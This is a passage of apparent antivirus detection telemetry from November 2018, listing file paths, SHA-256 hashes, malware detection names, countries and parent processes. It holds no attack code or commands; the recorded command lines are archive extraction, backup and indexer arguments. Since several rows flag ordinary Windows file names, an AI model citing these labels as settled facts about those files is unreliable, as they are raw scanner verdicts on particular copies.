  Row(detection=Row(filename='f12d1a47253f323bc30873cfcb535d66a338a562c86a73383353e561c8ccce33', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-31.categorizing\\F12D1A47253F323BC30873CFCB535D66A338A562C86A73383353E561C8CCCE33', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='f12d1a47253f323bc30873cfcb535d66a338a562c86a73383353e561c8ccce33', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-04T15:21:13Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='back graund.exe', filepath='H:\\\xa0\\Back graund\\Back graund.exe', filesize=0, name='WORM/Taranis.2225.#M0.#R0'), hash='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-04T12:48:42Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='fa97aba00f1b5fe70ec5c62dc1c08d559e20d0b64045f375fda312e85c4491d5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-04T05:01:49Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00251dd7', filepath='C:\\Windows\\TEMP\\tmp00005a66\\tmp00251dd7', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-01T06:34:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-090526-c28c2751', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_75a40268\\AVSCAN-20181101-090241-A0FE7819\\AVSCAN-20181101-090526-C28C2751', filesize=128000, name='TR/Spy.128000.#M1.#R1'), hash='fa0c6b4221df4fc0ee96673e82a1d8886483d7f5ab11af5315b4fc2106acf7aa', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T06:01:56Z'), dt=datetime.date(2018, 11, 1))],
 [Row(detection=Row(filename='yahoo! powered diril', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered diril', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='3265b893255a028475c06bee23f3fb1c9b1a3d1fbc7f50632a0bc55a13031cc0', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T17:51:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='uninshs.exe', filepath='C:\\Program Files\\KMSpico\\UninsHs.exe', filesize=192000, name='W32/Sality.AT.#M1.#R1'), hash='50baf9b5391ab32be32a66a06dc194fcbae5fb983c7df4d52c558651103a3fdb', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\is-39AUM.tmp\\o1odqvfy3eq.tmp', parentsize=817152, timestamp='2018-11-02T03:10:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='audiodg.exe', filepath='C:\\Windows\\System32\\audiodg.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='59d42f667f52e4572ae41eba26f810867c3a9b041622fb5bbbc5818e8f6f7fe8', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-02T14:48:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='repbrows.exe', filepath='D:\\Master\\Visual Basic\\OS\\MSAPPS\\REPOSTRY\\REPBROWS.EXE', filesize=512000, name='W32/Infector.Gen.#M300.#R7863'), hash='233663964a4c9e01582817103c0be5f1f73a1730bd9b673d4eafe0eae08acb09', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\AVAST Software\\Avast\\AvastSvc.exe', parentsize=325024, timestamp='2018-11-02T06:30:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='flashupdate.exe', filepath='C:\\Users\\X\\Downloads\\flashupdate.exe', filesize=1536000, name='TR/Dropper.Gen.#M300.#R3467'), hash='070eb33afc11530df004f70b7d8dd606ab877a41d14e253a01ca5da759365976', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T16:52:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-122347-60ea4c92', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_1cab3c85\\AVSCAN-20181102-122316-5A5F3162\\AVSCAN-20181102-122347-60EA4C92', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:23:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files (x86)\\Avira\\Antivirus\\AviraSecurityCenterAgent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T19:03:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='1c3bedf1d1214363ac3582e2df3f1e5e592ba8636e8480767d90be1867ad6d1b', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\1C3BEDF1D1214363AC3582E2DF3F1E5E592BA8636E8480767D90BE1867AD6D1B', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='1c3bedf1d1214363ac3582e2df3f1e5e592ba8636e8480767d90be1867ad6d1b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:44:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='transcodedwallpaper', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='25fcedda7822f68d0d8d335f6dbb38cf462cecec6601d640725e44c676432602', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-02T17:00:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files (x86)\\Avira\\Antivirus\\AviraSecurityCenterAgent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-02T18:43:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files\\Avira\\Antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-02T11:42:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='datamngrui.exe', filepath='\\?\\C:\\Program Files\\Movies Toolbar\\Datamngr\\DatamngrUI.exe', filesize=3584000, name='PUA/iLivid.iona.#M1.#R1'), hash='494a88016582ae557b75ec848e12d6646e459779691bacea54d7ff9b246aa70c', metadata=Row(cmdline=None, country='CL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T23:11:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:45:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='2e80d4e09ab2848696981ce3c00dab126a8084864368c0e3c5c9ebe9755c3e3d', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\2E80D4E09AB2848696981CE3C00DAB126A8084864368C0E3C5C9EBE9755C3E3D', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='2e80d4e09ab2848696981ce3c00dab126a8084864368c0e3c5c9ebe9755c3e3d', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-anf=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\Rar$LS0.126\\\\\\" -scul -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T11:19:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='precios.exe', filepath='C:\\EF3SRV\\Comunes\\SP15 - Club SAAS - SUNDECOP\\Club SAAS\\precios.exe', filesize=128000, name='W32/Alman.BB.#M1.#R1'), hash='27bc6957e7abb56f40bc3edb75c63a92f5ff913060e4d64a5acd538e66caa650', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe594_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe594 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='VE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T07:36:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tipptrainerin-downloader.exe', filepath='G:\\Downloads\\Tastaturtrainer\\tipptrainerin-Downloader.exe', filesize=512000, name='PUA/DownloadSponsor.Gen.#M300.#R5738'), hash='6ee1398b5a9c66ea69b7675bd5fdbaa41e7c2bf073aff1cb6ed856fbcd421f1d', metadata=Row(cmdline='G:\\\\\\\\ C:\\\\\\\\SANDISK-128\\\\\\\\ \\\\\\/MIR \\\\\\/TEE \\\\\\/FFT \\\\\\/R:0 \\\\\\/A-:HS \\\\\\/log:G:\\\\\\\\Setup\\\\\\\\batches\\\\\\\\backup-robocopy\\\\\\\\\\\\\\\\USBstick-Sicherung.log \\\\\\/XD G:\\\\\\\\microsoft G:\\\\\\\\musik G:\\\\\\\\SERVA-Root G:\\\\\\\\Setup\\\\\\\\wsusoffline G:\\\\\\\\Setup\\\\\\\\WSUS-W7 \\\\\\"$RECYCLE.BIN\\\\\\" \\\\\\"RECYCLER\\\\\\" \\\\\\"System Volume Information\\\\\\"', country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='G:\\Setup\\batches\\1_batchtools_x64\\robocopy.exe', parentsize=79872, timestamp='2018-11-02T20:35:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-155954-eca6ebdb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0858748c\\AVSCAN-20181102-155607-D410DE34\\AVSCAN-20181102-155954-ECA6EBDB', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:59:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='24dabbe3279f895d09d49475f6a79eb854ecc6c488038e22a9b5171dd4d069af', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-36\\24DABBE3279F895D09D49475F6A79EB854ECC6C488038E22A9B5171DD4D069AF', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='24dabbe3279f895d09d49475f6a79eb854ecc6c488038e22a9b5171dd4d069af', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:42:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-10-27-21-48-58.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-20T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-02T00:43:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-180329-57add8d5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_23c10ab5\\AVSCAN-20181102-173208-165F3A81\\AVSCAN-20181102-180329-57ADD8D5', filesize=840000, name='TR/Miner.OA.#M1.#R1'), hash='0978fcc7db3a27e180fca68b33d99c6bbe8173054f1cd0ebfd0fe0be35667656', metadata=Row(cmdline=None, country='GE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:03:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:36:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:16:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:38:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:20:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:33:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:34:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='0baeae4f38c82ac7f2ff54ebc54c82339f53059d0b5d44b5ae58ca2f80ab605e', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\0BAEAE4F38C82AC7F2FF54EBC54C82339F53059D0B5D44B5AE58CA2F80AB605E', filesize=148000, name='TR/Crypt.ZPACK.Gen7.#M300.#R600521'), hash='0baeae4f38c82ac7f2ff54ebc54c82339f53059d0b5d44b5ae58ca2f80ab605e', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-anf=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\Rar$LS0.126\\\\\\" -scul -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T10:25:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='cubede~2.dll', filepath='J:\\Data Prog VB\\Master\\crystal 9\\Crystal Report 9.0\\ProgramF\\CRYSTAL\\CRW9\\CUBEDE~2.DLL', filesize=128000, name='W32/Ramnit.CD.#M1.#R1'), hash='15e99a305a22f604409821a423274c7c2e24e2dc151b7a7284fba425418089e4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Mozilla Firefox\\firefox.exe', parentsize=450512, timestamp='2018-11-02T04:58:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:52:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='0c8150de81280b03e9780366d20f7c47b2616a55c63ea136a207bd61df7d57ae', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-02T09:35:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mhautopatch.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Temp1_msoxh.zip\\msoxh\\MHAutoPatch.exe', filesize=2560000, name='TR/Black.Gen2.#M300.#R100338'), hash='3600f95d74d3eedb693c26f0533afc0ac366bd857770711dbe9dafee1340bc5a', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\explorer.exe', parentsize=2501368, timestamp='2018-11-02T10:14:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:30:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:18:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:34:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:56:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='1abc6468bcb64cf4de3de544a6035b6c41b2f47c1bcb5bad554faebac0e6cb9f', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\1ABC6468BCB64CF4DE3DE544A6035B6C41B2F47C1BCB5BAD554FAEBAC0E6CB9F', filesize=2240000, name='TR/Taranis.3013.#M1.#R1'), hash='1abc6468bcb64cf4de3de544a6035b6c41b2f47c1bcb5bad554faebac0e6cb9f', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-38.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-37.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T13:27:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='gign.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\CAM\\GTA 2010الجديده\\GTA 2010الجديده\\GTA 2010الجديده\\New Folder\\New Folder (2)\\SKINS\\GIGN\\GIGN.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='20d0a90862ee256acffbcae90ad1cfb3c3ad06aabb3a78023e07e3382293e692', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:26:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-083917-4467e333', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_208d8027\\AVSCAN-20181102-083903-41D0CB2D\\AVSCAN-20181102-083917-4467E333', filesize=2560000, name='TR/Black.Gen2.#M1.#R1'), hash='3600f95d74d3eedb693c26f0533afc0ac366bd857770711dbe9dafee1340bc5a', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T00:39:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='07c59e235f5bfee95665a1877145bd9ee84f0f9ea8bf3a77bf33d1bc3e92c4ce', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-37\\07C59E235F5BFEE95665A1877145BD9EE84F0F9EA8BF3A77BF33D1BC3E92C4CE', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='07c59e235f5bfee95665a1877145bd9ee84f0f9ea8bf3a77bf33d1bc3e92c4ce', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:56:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:37:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:25:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:20:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:17:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:02:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='pdf_contract agreement.tar --> j111.exe', filepath='pdf_CONTRACT AGREEMENT.tar --> J111.exe', filesize=1152000, name='DR/Delphi.6abe65.#M1.#R1'), hash='6abe6528568d3820b27e309c4369b24bf0f1dc41bf8c3774d9c2526104f6a5ff', metadata=Row(cmdline=None, country='DE', os_name='Linux', os_vmajor='3', os_vminor='14', parentproc=None, parentsize=None, timestamp='2018-11-02T02:15:05Z'), dt=datetime.date(2018, 11, 2)),
